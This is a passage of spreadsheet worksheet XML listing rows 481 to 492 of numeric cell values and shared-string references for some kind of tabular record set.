      <c r="AW481">
        <v>0</v>
      </c>
      <c r="AX481">
        <v>0</v>
      </c>
      <c r="AY481">
        <v>9</v>
      </c>
      <c r="AZ481">
        <v>1</v>
      </c>
      <c r="BA481" t="s">
        <v>16903</v>
      </c>
      <c r="BB481" t="s">
        <v>15295</v>
      </c>
      <c r="BC481">
        <v>0</v>
      </c>
      <c r="BD481" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="482" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A482">
        <v>1379</v>
      </c>
      <c r="B482" t="s">
        <v>3913</v>
      </c>
      <c r="C482" t="s">
        <v>2848</v>
      </c>
      <c r="D482" t="s">
        <v>3914</v>
      </c>
      <c r="E482" t="s">
        <v>49</v>
      </c>
      <c r="F482" t="s">
        <v>1276</v>
      </c>
      <c r="G482" s="1">
        <v>44193</v>
      </c>
      <c r="H482">
        <v>7606</v>
      </c>
      <c r="I482">
        <v>7606</v>
      </c>
      <c r="J482">
        <v>2</v>
      </c>
      <c r="K482">
        <v>0</v>
      </c>
      <c r="L482">
        <v>0</v>
      </c>
      <c r="M482">
        <v>7</v>
      </c>
      <c r="N482">
        <v>3500</v>
      </c>
      <c r="O482">
        <v>0</v>
      </c>
      <c r="P482">
        <v>0</v>
      </c>
      <c r="Q482">
        <v>1</v>
      </c>
      <c r="R482">
        <v>4</v>
      </c>
      <c r="S482">
        <v>0</v>
      </c>
      <c r="T482">
        <v>1</v>
      </c>
      <c r="U482">
        <v>6000</v>
      </c>
      <c r="V482">
        <v>0</v>
      </c>
      <c r="W482">
        <v>0</v>
      </c>
      <c r="X482">
        <v>3500</v>
      </c>
      <c r="Y482">
        <v>0</v>
      </c>
      <c r="Z482">
        <v>0</v>
      </c>
      <c r="AA482">
        <v>0</v>
      </c>
      <c r="AB482">
        <v>0</v>
      </c>
      <c r="AC482">
        <v>11000</v>
      </c>
      <c r="AD482">
        <v>0</v>
      </c>
      <c r="AE482">
        <v>200000</v>
      </c>
      <c r="AF482" t="s">
        <v>3915</v>
      </c>
      <c r="AG482">
        <v>30151</v>
      </c>
      <c r="AH482">
        <v>9</v>
      </c>
      <c r="AJ482">
        <v>112</v>
      </c>
      <c r="AK482" t="s">
        <v>3916</v>
      </c>
      <c r="AL482" t="s">
        <v>3917</v>
      </c>
      <c r="AM482" t="s">
        <v>3918</v>
      </c>
      <c r="AN482" t="s">
        <v>68</v>
      </c>
      <c r="AO482">
        <v>2015</v>
      </c>
      <c r="AP482" t="s">
        <v>3919</v>
      </c>
      <c r="AQ482" t="s">
        <v>3920</v>
      </c>
      <c r="AR482" t="s">
        <v>3915</v>
      </c>
      <c r="AS482" t="s">
        <v>71</v>
      </c>
      <c r="AT482" t="s">
        <v>72</v>
      </c>
      <c r="AU482">
        <v>30</v>
      </c>
      <c r="AV482">
        <v>1</v>
      </c>
      <c r="AW482">
        <v>3</v>
      </c>
      <c r="AX482">
        <v>23</v>
      </c>
      <c r="AY482">
        <v>0</v>
      </c>
      <c r="AZ482">
        <v>0</v>
      </c>
      <c r="BA482" t="s">
        <v>16864</v>
      </c>
      <c r="BB482" t="s">
        <v>15237</v>
      </c>
      <c r="BC482" t="s">
        <v>12632</v>
      </c>
      <c r="BD482">
        <v>0</v>
      </c>
    </row>
    <row r="483" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A483">
        <v>1170</v>
      </c>
      <c r="B483" t="s">
        <v>3921</v>
      </c>
      <c r="C483" t="s">
        <v>168</v>
      </c>
      <c r="D483" t="s">
        <v>3922</v>
      </c>
      <c r="E483" t="s">
        <v>111</v>
      </c>
      <c r="F483" t="s">
        <v>3923</v>
      </c>
      <c r="G483" s="1">
        <v>44347</v>
      </c>
      <c r="H483">
        <v>7642</v>
      </c>
      <c r="I483">
        <v>7642</v>
      </c>
      <c r="J483">
        <v>1</v>
      </c>
      <c r="K483">
        <v>0</v>
      </c>
      <c r="L483">
        <v>0</v>
      </c>
      <c r="M483">
        <v>0</v>
      </c>
      <c r="N483">
        <v>0</v>
      </c>
      <c r="O483">
        <v>0</v>
      </c>
      <c r="P483">
        <v>0</v>
      </c>
      <c r="Q483">
        <v>2</v>
      </c>
      <c r="R483">
        <v>2</v>
      </c>
      <c r="S483">
        <v>0</v>
      </c>
      <c r="T483">
        <v>0</v>
      </c>
      <c r="U483">
        <v>3000000</v>
      </c>
      <c r="V483">
        <v>0</v>
      </c>
      <c r="W483">
        <v>0</v>
      </c>
      <c r="X483">
        <v>0</v>
      </c>
      <c r="Y483">
        <v>0</v>
      </c>
      <c r="Z483">
        <v>0</v>
      </c>
      <c r="AA483">
        <v>0</v>
      </c>
      <c r="AB483">
        <v>1000</v>
      </c>
      <c r="AC483">
        <v>1000</v>
      </c>
      <c r="AD483">
        <v>0</v>
      </c>
      <c r="AE483">
        <v>0</v>
      </c>
      <c r="AF483" t="s">
        <v>3924</v>
      </c>
      <c r="AG483">
        <v>17414</v>
      </c>
      <c r="AH483">
        <v>13</v>
      </c>
      <c r="AJ483">
        <v>183</v>
      </c>
      <c r="AK483" t="s">
        <v>2832</v>
      </c>
      <c r="AL483" t="s">
        <v>2833</v>
      </c>
      <c r="AM483" t="s">
        <v>3925</v>
      </c>
      <c r="AN483" t="s">
        <v>82</v>
      </c>
      <c r="AO483">
        <v>2005</v>
      </c>
      <c r="AP483" t="s">
        <v>2835</v>
      </c>
      <c r="AQ483" t="s">
        <v>3926</v>
      </c>
      <c r="AR483" t="s">
        <v>3924</v>
      </c>
      <c r="AS483" t="s">
        <v>179</v>
      </c>
      <c r="AT483" t="s">
        <v>86</v>
      </c>
      <c r="AU483">
        <v>25</v>
      </c>
      <c r="AV483">
        <v>1</v>
      </c>
      <c r="AW483">
        <v>0</v>
      </c>
      <c r="AX483">
        <v>0</v>
      </c>
      <c r="AY483">
        <v>12</v>
      </c>
      <c r="AZ483">
        <v>2</v>
      </c>
      <c r="BA483" t="s">
        <v>16813</v>
      </c>
      <c r="BB483" t="s">
        <v>15096</v>
      </c>
      <c r="BC483" t="s">
        <v>10267</v>
      </c>
      <c r="BD483">
        <v>0</v>
      </c>
    </row>
    <row r="484" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A484">
        <v>1554</v>
      </c>
      <c r="B484" t="s">
        <v>3927</v>
      </c>
      <c r="C484" t="s">
        <v>458</v>
      </c>
      <c r="D484" t="s">
        <v>3928</v>
      </c>
      <c r="E484" t="s">
        <v>843</v>
      </c>
      <c r="F484" t="s">
        <v>859</v>
      </c>
      <c r="G484" s="1">
        <v>44187</v>
      </c>
      <c r="H484">
        <v>7666</v>
      </c>
      <c r="I484">
        <v>7666</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t="s">
        <v>3929</v>
      </c>
      <c r="AG484">
        <v>29150</v>
      </c>
      <c r="AH484">
        <v>5</v>
      </c>
      <c r="AJ484">
        <v>149</v>
      </c>
      <c r="AK484" t="s">
        <v>1355</v>
      </c>
      <c r="AL484" t="s">
        <v>1356</v>
      </c>
      <c r="AM484" t="s">
        <v>3930</v>
      </c>
      <c r="AN484" t="s">
        <v>55</v>
      </c>
      <c r="AO484">
        <v>2018</v>
      </c>
      <c r="AP484">
        <v>8126163110</v>
      </c>
      <c r="AQ484" t="s">
        <v>3931</v>
      </c>
      <c r="AR484" t="s">
        <v>3929</v>
      </c>
      <c r="AS484" t="s">
        <v>71</v>
      </c>
      <c r="AT484" t="s">
        <v>58</v>
      </c>
      <c r="AU484">
        <v>28</v>
      </c>
      <c r="AV484">
        <v>1</v>
      </c>
      <c r="AW484">
        <v>7</v>
      </c>
      <c r="AX484">
        <v>1</v>
      </c>
      <c r="AY484">
        <v>6</v>
      </c>
      <c r="AZ484">
        <v>1</v>
      </c>
      <c r="BA484" t="s">
        <v>16932</v>
      </c>
      <c r="BB484" t="s">
        <v>15360</v>
      </c>
      <c r="BC484" t="s">
        <v>10222</v>
      </c>
      <c r="BD484" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="485" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A485">
        <v>1434</v>
      </c>
      <c r="B485" t="s">
        <v>3932</v>
      </c>
      <c r="C485" t="s">
        <v>129</v>
      </c>
      <c r="D485" t="s">
        <v>3933</v>
      </c>
      <c r="E485" t="s">
        <v>111</v>
      </c>
      <c r="F485" t="s">
        <v>3934</v>
      </c>
      <c r="G485" s="1">
        <v>44281</v>
      </c>
      <c r="H485">
        <v>7687</v>
      </c>
      <c r="I485">
        <v>7687</v>
      </c>
      <c r="J485">
        <v>1</v>
      </c>
      <c r="K485">
        <v>1</v>
      </c>
      <c r="L485">
        <v>0</v>
      </c>
      <c r="M485">
        <v>0</v>
      </c>
      <c r="N485">
        <v>0</v>
      </c>
      <c r="O485">
        <v>0</v>
      </c>
      <c r="P485">
        <v>0</v>
      </c>
      <c r="Q485">
        <v>0</v>
      </c>
      <c r="R485">
        <v>0</v>
      </c>
      <c r="S485">
        <v>0</v>
      </c>
      <c r="T485">
        <v>1</v>
      </c>
      <c r="U485">
        <v>150000</v>
      </c>
      <c r="V485">
        <v>400</v>
      </c>
      <c r="W485">
        <v>0</v>
      </c>
      <c r="X485">
        <v>0</v>
      </c>
      <c r="Y485">
        <v>0</v>
      </c>
      <c r="Z485">
        <v>0</v>
      </c>
      <c r="AA485">
        <v>0</v>
      </c>
      <c r="AB485">
        <v>0</v>
      </c>
      <c r="AC485">
        <v>0</v>
      </c>
      <c r="AD485">
        <v>0</v>
      </c>
      <c r="AE485">
        <v>250000</v>
      </c>
      <c r="AF485" t="s">
        <v>3935</v>
      </c>
      <c r="AG485">
        <v>15211</v>
      </c>
      <c r="AH485">
        <v>11</v>
      </c>
      <c r="AJ485">
        <v>268</v>
      </c>
      <c r="AK485" t="s">
        <v>252</v>
      </c>
      <c r="AL485" t="s">
        <v>174</v>
      </c>
      <c r="AM485" t="s">
        <v>3936</v>
      </c>
      <c r="AN485" t="s">
        <v>55</v>
      </c>
      <c r="AO485">
        <v>2012</v>
      </c>
      <c r="AP485">
        <v>216919293</v>
      </c>
      <c r="AQ485" t="s">
        <v>3937</v>
      </c>
      <c r="AR485" t="s">
        <v>3935</v>
      </c>
      <c r="AS485" t="s">
        <v>179</v>
      </c>
      <c r="AT485" t="s">
        <v>58</v>
      </c>
      <c r="AU485">
        <v>20</v>
      </c>
      <c r="AV485">
        <v>1</v>
      </c>
      <c r="AW485">
        <v>15</v>
      </c>
      <c r="AX485">
        <v>0</v>
      </c>
      <c r="AY485">
        <v>6</v>
      </c>
      <c r="AZ485">
        <v>6</v>
      </c>
      <c r="BA485" t="s">
        <v>16888</v>
      </c>
      <c r="BB485" t="s">
        <v>14763</v>
      </c>
      <c r="BC485" t="s">
        <v>12784</v>
      </c>
      <c r="BD485" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="486" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A486">
        <v>911</v>
      </c>
      <c r="B486" t="s">
        <v>3938</v>
      </c>
      <c r="C486" t="s">
        <v>47</v>
      </c>
      <c r="D486" t="s">
        <v>3939</v>
      </c>
      <c r="E486" t="s">
        <v>142</v>
      </c>
      <c r="F486" t="s">
        <v>673</v>
      </c>
      <c r="G486" s="1">
        <v>44217</v>
      </c>
      <c r="H486">
        <v>7727</v>
      </c>
      <c r="I486">
        <v>7727</v>
      </c>
      <c r="J486">
        <v>1</v>
      </c>
      <c r="K486">
        <v>0</v>
      </c>
      <c r="L486">
        <v>0</v>
      </c>
      <c r="M486">
        <v>0</v>
      </c>
      <c r="N486">
        <v>0</v>
      </c>
      <c r="O486">
        <v>0</v>
      </c>
      <c r="P486">
        <v>0</v>
      </c>
      <c r="Q486">
        <v>0</v>
      </c>
      <c r="R486">
        <v>0</v>
      </c>
      <c r="S486">
        <v>0</v>
      </c>
      <c r="T486">
        <v>0</v>
      </c>
      <c r="U486">
        <v>25000</v>
      </c>
      <c r="V486">
        <v>0</v>
      </c>
      <c r="W486">
        <v>0</v>
      </c>
      <c r="X486">
        <v>0</v>
      </c>
      <c r="Y486">
        <v>0</v>
      </c>
      <c r="Z486">
        <v>0</v>
      </c>
      <c r="AA486">
        <v>0</v>
      </c>
      <c r="AB486">
        <v>0</v>
      </c>
      <c r="AC486">
        <v>0</v>
      </c>
      <c r="AD486">
        <v>0</v>
      </c>
      <c r="AE486">
        <v>0</v>
      </c>
      <c r="AF486" t="s">
        <v>3940</v>
      </c>
      <c r="AG486">
        <v>20242</v>
      </c>
      <c r="AH486">
        <v>2</v>
      </c>
      <c r="AJ486">
        <v>53</v>
      </c>
      <c r="AK486" t="s">
        <v>1582</v>
      </c>
      <c r="AL486" t="s">
        <v>1583</v>
      </c>
      <c r="AM486" t="s">
        <v>3941</v>
      </c>
      <c r="AN486" t="s">
        <v>55</v>
      </c>
      <c r="AO486">
        <v>2009</v>
      </c>
      <c r="AP486" t="s">
        <v>3942</v>
      </c>
      <c r="AQ486" t="s">
        <v>3943</v>
      </c>
      <c r="AR486" t="s">
        <v>3944</v>
      </c>
      <c r="AS486" t="s">
        <v>71</v>
      </c>
      <c r="AT486" t="s">
        <v>58</v>
      </c>
      <c r="AU486">
        <v>30</v>
      </c>
      <c r="AV486">
        <v>1</v>
      </c>
      <c r="AW486">
        <v>57</v>
      </c>
      <c r="AX486">
        <v>421</v>
      </c>
      <c r="AY486">
        <v>63</v>
      </c>
      <c r="AZ486">
        <v>454</v>
      </c>
      <c r="BA486" t="s">
        <v>16773</v>
      </c>
      <c r="BB486" t="s">
        <v>14932</v>
      </c>
      <c r="BC486">
        <v>0</v>
      </c>
      <c r="BD486" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="487" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A487">
        <v>1034</v>
      </c>
      <c r="B487" t="s">
        <v>3945</v>
      </c>
      <c r="C487" t="s">
        <v>157</v>
      </c>
      <c r="D487" t="s">
        <v>3946</v>
      </c>
      <c r="E487" t="s">
        <v>142</v>
      </c>
      <c r="F487" t="s">
        <v>666</v>
      </c>
      <c r="G487" s="1">
        <v>44274</v>
      </c>
      <c r="H487">
        <v>7739</v>
      </c>
      <c r="I487">
        <v>7739</v>
      </c>
      <c r="J487">
        <v>1</v>
      </c>
      <c r="K487">
        <v>2</v>
      </c>
      <c r="L487">
        <v>3</v>
      </c>
      <c r="M487">
        <v>0</v>
      </c>
      <c r="N487">
        <v>0</v>
      </c>
      <c r="O487">
        <v>0</v>
      </c>
      <c r="P487">
        <v>0</v>
      </c>
      <c r="Q487">
        <v>1</v>
      </c>
      <c r="R487">
        <v>1</v>
      </c>
      <c r="S487">
        <v>0</v>
      </c>
      <c r="T487">
        <v>1</v>
      </c>
      <c r="U487">
        <v>20000</v>
      </c>
      <c r="V487">
        <v>6000</v>
      </c>
      <c r="W487">
        <v>12000</v>
      </c>
      <c r="X487">
        <v>0</v>
      </c>
      <c r="Y487">
        <v>0</v>
      </c>
      <c r="Z487">
        <v>0</v>
      </c>
      <c r="AA487">
        <v>0</v>
      </c>
      <c r="AB487">
        <v>15000</v>
      </c>
      <c r="AC487">
        <v>0</v>
      </c>
      <c r="AD487">
        <v>0</v>
      </c>
      <c r="AE487">
        <v>10000</v>
      </c>
      <c r="AF487" t="s">
        <v>3947</v>
      </c>
      <c r="AG487">
        <v>66382</v>
      </c>
      <c r="AH487">
        <v>16</v>
      </c>
      <c r="AJ487">
        <v>230</v>
      </c>
      <c r="AK487" t="s">
        <v>2692</v>
      </c>
      <c r="AL487" t="s">
        <v>3948</v>
      </c>
      <c r="AM487" t="s">
        <v>3949</v>
      </c>
      <c r="AN487" t="s">
        <v>68</v>
      </c>
      <c r="AO487">
        <v>2018</v>
      </c>
      <c r="AP487" t="s">
        <v>3950</v>
      </c>
      <c r="AQ487" t="s">
        <v>3947</v>
      </c>
      <c r="AR487" t="s">
        <v>3947</v>
      </c>
      <c r="AS487" t="s">
        <v>71</v>
      </c>
      <c r="AT487" t="s">
        <v>72</v>
      </c>
      <c r="AU487">
        <v>0</v>
      </c>
      <c r="AV487">
        <v>0</v>
      </c>
      <c r="AW487">
        <v>8</v>
      </c>
      <c r="AX487">
        <v>8</v>
      </c>
      <c r="AY487">
        <v>6</v>
      </c>
      <c r="AZ487">
        <v>0</v>
      </c>
      <c r="BA487" t="s">
        <v>17615</v>
      </c>
      <c r="BB487" t="s">
        <v>15015</v>
      </c>
      <c r="BC487" t="s">
        <v>12642</v>
      </c>
      <c r="BD487">
        <v>0</v>
      </c>
    </row>
    <row r="488" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A488">
        <v>1072</v>
      </c>
      <c r="B488" t="s">
        <v>3951</v>
      </c>
      <c r="C488" t="s">
        <v>47</v>
      </c>
      <c r="D488" t="s">
        <v>3952</v>
      </c>
      <c r="E488" t="s">
        <v>142</v>
      </c>
      <c r="F488" t="s">
        <v>666</v>
      </c>
      <c r="G488" s="1">
        <v>44368</v>
      </c>
      <c r="H488">
        <v>7783</v>
      </c>
      <c r="I488">
        <v>7783</v>
      </c>
      <c r="J488">
        <v>2</v>
      </c>
      <c r="K488">
        <v>1</v>
      </c>
      <c r="L488">
        <v>2</v>
      </c>
      <c r="M488">
        <v>2</v>
      </c>
      <c r="N488">
        <v>0</v>
      </c>
      <c r="O488">
        <v>0</v>
      </c>
      <c r="P488">
        <v>0</v>
      </c>
      <c r="Q488">
        <v>10</v>
      </c>
      <c r="R488">
        <v>25</v>
      </c>
      <c r="S488">
        <v>1</v>
      </c>
      <c r="T488">
        <v>1</v>
      </c>
      <c r="U488">
        <v>700000</v>
      </c>
      <c r="V488">
        <v>1</v>
      </c>
      <c r="W488">
        <v>4000</v>
      </c>
      <c r="X488">
        <v>1500</v>
      </c>
      <c r="Y488">
        <v>0</v>
      </c>
      <c r="Z488">
        <v>0</v>
      </c>
      <c r="AA488">
        <v>0</v>
      </c>
      <c r="AB488">
        <v>3000</v>
      </c>
      <c r="AC488">
        <v>30</v>
      </c>
      <c r="AD488">
        <v>1</v>
      </c>
      <c r="AE488">
        <v>100000</v>
      </c>
      <c r="AF488" t="s">
        <v>3953</v>
      </c>
      <c r="AG488">
        <v>22616</v>
      </c>
      <c r="AH488">
        <v>2</v>
      </c>
      <c r="AJ488">
        <v>27</v>
      </c>
      <c r="AK488" t="s">
        <v>2607</v>
      </c>
      <c r="AL488" t="s">
        <v>2608</v>
      </c>
      <c r="AM488" t="s">
        <v>3954</v>
      </c>
      <c r="AN488" t="s">
        <v>68</v>
      </c>
      <c r="AO488">
        <v>2014</v>
      </c>
      <c r="AP488" t="s">
        <v>3955</v>
      </c>
      <c r="AQ488" t="s">
        <v>3956</v>
      </c>
      <c r="AR488" t="s">
        <v>3956</v>
      </c>
      <c r="AS488" t="s">
        <v>71</v>
      </c>
      <c r="AT488" t="s">
        <v>72</v>
      </c>
      <c r="AU488">
        <v>6</v>
      </c>
      <c r="AV488">
        <v>1</v>
      </c>
      <c r="AW488">
        <v>8</v>
      </c>
      <c r="AX488">
        <v>14</v>
      </c>
      <c r="AY488">
        <v>4</v>
      </c>
      <c r="AZ488">
        <v>7</v>
      </c>
      <c r="BA488" t="s">
        <v>16792</v>
      </c>
      <c r="BB488" t="s">
        <v>15013</v>
      </c>
      <c r="BC488" t="s">
        <v>14155</v>
      </c>
      <c r="BD488">
        <v>0</v>
      </c>
    </row>
    <row r="489" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A489">
        <v>1385</v>
      </c>
      <c r="B489" t="s">
        <v>3957</v>
      </c>
      <c r="C489" t="s">
        <v>129</v>
      </c>
      <c r="D489" t="s">
        <v>3958</v>
      </c>
      <c r="E489" t="s">
        <v>49</v>
      </c>
      <c r="F489" t="s">
        <v>3959</v>
      </c>
      <c r="G489" s="1">
        <v>44216</v>
      </c>
      <c r="H489">
        <v>7801</v>
      </c>
      <c r="I489">
        <v>7801</v>
      </c>
      <c r="J489">
        <v>0</v>
      </c>
      <c r="K489">
        <v>1</v>
      </c>
      <c r="L489">
        <v>0</v>
      </c>
      <c r="M489">
        <v>0</v>
      </c>
      <c r="N489">
        <v>0</v>
      </c>
      <c r="O489">
        <v>0</v>
      </c>
      <c r="P489">
        <v>0</v>
      </c>
      <c r="Q489">
        <v>0</v>
      </c>
      <c r="R489">
        <v>10</v>
      </c>
      <c r="S489">
        <v>0</v>
      </c>
      <c r="T489">
        <v>0</v>
      </c>
      <c r="U489">
        <v>0</v>
      </c>
      <c r="V489">
        <v>2500</v>
      </c>
      <c r="W489">
        <v>0</v>
      </c>
      <c r="X489">
        <v>0</v>
      </c>
      <c r="Y489">
        <v>0</v>
      </c>
      <c r="Z489">
        <v>0</v>
      </c>
      <c r="AA489">
        <v>0</v>
      </c>
      <c r="AB489">
        <v>0</v>
      </c>
      <c r="AC489">
        <v>5000</v>
      </c>
      <c r="AD489">
        <v>0</v>
      </c>
      <c r="AE489">
        <v>0</v>
      </c>
      <c r="AF489" t="s">
        <v>3960</v>
      </c>
      <c r="AG489">
        <v>0</v>
      </c>
      <c r="AH489">
        <v>11</v>
      </c>
      <c r="AJ489">
        <v>270</v>
      </c>
      <c r="AK489" t="s">
        <v>620</v>
      </c>
      <c r="AL489" t="s">
        <v>630</v>
      </c>
      <c r="AM489" t="s">
        <v>3961</v>
      </c>
      <c r="AN489" t="s">
        <v>55</v>
      </c>
      <c r="AO489">
        <v>2018</v>
      </c>
      <c r="AP489">
        <v>81284083879</v>
      </c>
      <c r="AQ489">
        <v>82218770582</v>
      </c>
      <c r="AR489" t="s">
        <v>3960</v>
      </c>
      <c r="AS489" t="s">
        <v>57</v>
      </c>
      <c r="AT489" t="s">
        <v>58</v>
      </c>
      <c r="AU489">
        <v>25</v>
      </c>
      <c r="AV489">
        <v>0</v>
      </c>
      <c r="AW489">
        <v>0</v>
      </c>
      <c r="AX489">
        <v>0</v>
      </c>
      <c r="AY489">
        <v>14</v>
      </c>
      <c r="AZ489">
        <v>0</v>
      </c>
      <c r="BA489" t="s">
        <v>16867</v>
      </c>
      <c r="BB489" t="s">
        <v>15242</v>
      </c>
      <c r="BC489">
        <v>0</v>
      </c>
      <c r="BD489" t="s">
        <v>12669</v>
      </c>
    </row>
    <row r="490" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A490">
        <v>1402</v>
      </c>
      <c r="B490" t="s">
        <v>3962</v>
      </c>
      <c r="C490" t="s">
        <v>3692</v>
      </c>
      <c r="D490" t="s">
        <v>3963</v>
      </c>
      <c r="E490" t="s">
        <v>412</v>
      </c>
      <c r="F490" t="s">
        <v>3964</v>
      </c>
      <c r="G490" s="1">
        <v>44238</v>
      </c>
      <c r="H490">
        <v>7855</v>
      </c>
      <c r="I490">
        <v>7855</v>
      </c>
      <c r="J490">
        <v>0</v>
      </c>
      <c r="K490">
        <v>0</v>
      </c>
      <c r="L490">
        <v>0</v>
      </c>
      <c r="M490">
        <v>0</v>
      </c>
      <c r="N490">
        <v>400</v>
      </c>
      <c r="O490">
        <v>0</v>
      </c>
      <c r="P490">
        <v>0</v>
      </c>
      <c r="Q490">
        <v>5</v>
      </c>
      <c r="R490">
        <v>5</v>
      </c>
      <c r="S490">
        <v>0</v>
      </c>
      <c r="T490">
        <v>0</v>
      </c>
      <c r="U490">
        <v>0</v>
      </c>
      <c r="V490">
        <v>0</v>
      </c>
      <c r="W490">
        <v>0</v>
      </c>
      <c r="X490">
        <v>0</v>
      </c>
      <c r="Y490">
        <v>0</v>
      </c>
      <c r="Z490">
        <v>0</v>
      </c>
      <c r="AA490">
        <v>0</v>
      </c>
      <c r="AB490">
        <v>150</v>
      </c>
      <c r="AC490">
        <v>150</v>
      </c>
      <c r="AD490">
        <v>0</v>
      </c>
      <c r="AE490">
        <v>0</v>
      </c>
      <c r="AF490" t="s">
        <v>3965</v>
      </c>
      <c r="AG490">
        <v>25586</v>
      </c>
      <c r="AH490">
        <v>3</v>
      </c>
      <c r="AJ490">
        <v>62</v>
      </c>
      <c r="AK490" t="s">
        <v>3966</v>
      </c>
      <c r="AL490" t="s">
        <v>3967</v>
      </c>
      <c r="AM490" t="s">
        <v>3968</v>
      </c>
      <c r="AN490" t="s">
        <v>68</v>
      </c>
      <c r="AO490">
        <v>2013</v>
      </c>
      <c r="AP490">
        <v>85319606302</v>
      </c>
      <c r="AQ490" t="s">
        <v>3969</v>
      </c>
      <c r="AR490" t="s">
        <v>3965</v>
      </c>
      <c r="AS490" t="s">
        <v>71</v>
      </c>
      <c r="AT490" t="s">
        <v>72</v>
      </c>
      <c r="AU490">
        <v>25</v>
      </c>
      <c r="AV490">
        <v>1</v>
      </c>
      <c r="AW490">
        <v>0</v>
      </c>
      <c r="AX490">
        <v>0</v>
      </c>
      <c r="AY490">
        <v>0</v>
      </c>
      <c r="AZ490">
        <v>4</v>
      </c>
      <c r="BA490" t="s">
        <v>17508</v>
      </c>
      <c r="BB490" t="s">
        <v>17658</v>
      </c>
      <c r="BC490" t="s">
        <v>13064</v>
      </c>
      <c r="BD490">
        <v>0</v>
      </c>
    </row>
    <row r="491" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A491">
        <v>1447</v>
      </c>
      <c r="B491" t="s">
        <v>3970</v>
      </c>
      <c r="C491" t="s">
        <v>74</v>
      </c>
      <c r="D491" t="s">
        <v>3971</v>
      </c>
      <c r="E491" t="s">
        <v>49</v>
      </c>
      <c r="F491" t="s">
        <v>3972</v>
      </c>
      <c r="G491" s="1">
        <v>44277</v>
      </c>
      <c r="H491">
        <v>7894</v>
      </c>
      <c r="I491">
        <v>7894</v>
      </c>
      <c r="J491">
        <v>0</v>
      </c>
      <c r="K491">
        <v>0</v>
      </c>
      <c r="L491">
        <v>0</v>
      </c>
      <c r="M491">
        <v>0</v>
      </c>
      <c r="N491">
        <v>0</v>
      </c>
      <c r="O491">
        <v>0</v>
      </c>
      <c r="P491">
        <v>0</v>
      </c>
      <c r="Q491">
        <v>3</v>
      </c>
      <c r="R491">
        <v>3</v>
      </c>
      <c r="S491">
        <v>0</v>
      </c>
      <c r="T491">
        <v>8</v>
      </c>
      <c r="U491">
        <v>0</v>
      </c>
      <c r="V491">
        <v>0</v>
      </c>
      <c r="W491">
        <v>0</v>
      </c>
      <c r="X491">
        <v>0</v>
      </c>
      <c r="Y491">
        <v>0</v>
      </c>
      <c r="Z491">
        <v>0</v>
      </c>
      <c r="AA491">
        <v>0</v>
      </c>
      <c r="AB491">
        <v>25000</v>
      </c>
      <c r="AC491">
        <v>25000</v>
      </c>
      <c r="AD491">
        <v>0</v>
      </c>
      <c r="AE491">
        <v>200000</v>
      </c>
      <c r="AF491" t="s">
        <v>3973</v>
      </c>
      <c r="AG491">
        <v>56151</v>
      </c>
      <c r="AH491">
        <v>14</v>
      </c>
      <c r="AJ491">
        <v>195</v>
      </c>
      <c r="AK491" t="s">
        <v>3974</v>
      </c>
      <c r="AL491" t="s">
        <v>3974</v>
      </c>
      <c r="AM491" t="s">
        <v>3975</v>
      </c>
      <c r="AN491" t="s">
        <v>55</v>
      </c>
      <c r="AO491">
        <v>2011</v>
      </c>
      <c r="AP491" t="s">
        <v>3976</v>
      </c>
      <c r="AQ491" t="s">
        <v>3977</v>
      </c>
      <c r="AR491" t="s">
        <v>3973</v>
      </c>
      <c r="AS491" t="s">
        <v>71</v>
      </c>
      <c r="AT491" t="s">
        <v>58</v>
      </c>
      <c r="AU491">
        <v>25</v>
      </c>
      <c r="AV491">
        <v>1</v>
      </c>
      <c r="AW491">
        <v>5</v>
      </c>
      <c r="AX491">
        <v>30</v>
      </c>
      <c r="AY491">
        <v>2</v>
      </c>
      <c r="AZ491">
        <v>6</v>
      </c>
      <c r="BA491" t="s">
        <v>16896</v>
      </c>
      <c r="BB491" t="s">
        <v>15283</v>
      </c>
      <c r="BC491">
        <v>0</v>
      </c>
      <c r="BD491" t="s">
        <v>12692</v>
      </c>
    </row>
    <row r="492" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A492">
        <v>1078</v>
      </c>
      <c r="B492" t="s">
        <v>3978</v>
      </c>
      <c r="C492" t="s">
        <v>74</v>
      </c>
      <c r="D492" t="s">
        <v>3979</v>
      </c>
      <c r="E492" t="s">
        <v>528</v>
      </c>
      <c r="F492" t="s">
        <v>3980</v>
      </c>
      <c r="G492" s="1">
        <v>44286</v>
      </c>
      <c r="H492">
        <v>7903</v>
      </c>
      <c r="I492">
        <v>7903</v>
      </c>
      <c r="J492">
        <v>0</v>
      </c>
      <c r="K492">
        <v>0</v>
      </c>
      <c r="L492">
        <v>0</v>
      </c>
      <c r="M492">
        <v>0</v>
      </c>
      <c r="N492">
        <v>0</v>
      </c>
      <c r="O492">
        <v>0</v>
      </c>
      <c r="P492">
        <v>0</v>
      </c>
      <c r="Q492">
        <v>0</v>
      </c>
      <c r="R492">
        <v>0</v>
      </c>
      <c r="S492">
        <v>0</v>
      </c>
      <c r="T492">
        <v>1</v>
      </c>
      <c r="U492">
        <v>0</v>
      </c>
      <c r="V492">
        <v>0</v>
      </c>
      <c r="W492">
        <v>0</v>
      </c>
      <c r="X492">
        <v>0</v>
      </c>
      <c r="Y492">
        <v>0</v>
      </c>
      <c r="Z492">
        <v>0</v>
      </c>
      <c r="AA492">
        <v>0</v>
      </c>
      <c r="AB492">
        <v>0</v>
      </c>
      <c r="AC492">
        <v>0</v>
      </c>
      <c r="AD492">
        <v>0</v>
      </c>
      <c r="AE492">
        <v>500</v>
      </c>
      <c r="AF492" t="s">
        <v>3981</v>
      </c>
      <c r="AG492">
        <v>50161</v>
      </c>
      <c r="AH492">
        <v>14</v>
      </c>
      <c r="AJ492">
        <v>220</v>
      </c>
      <c r="AK492" t="s">
        <v>3982</v>
      </c>
      <c r="AL492" t="s">
        <v>3983</v>
      </c>
      <c r="AM492" t="s">
        <v>3984</v>
      </c>
      <c r="AN492" t="s">
        <v>68</v>
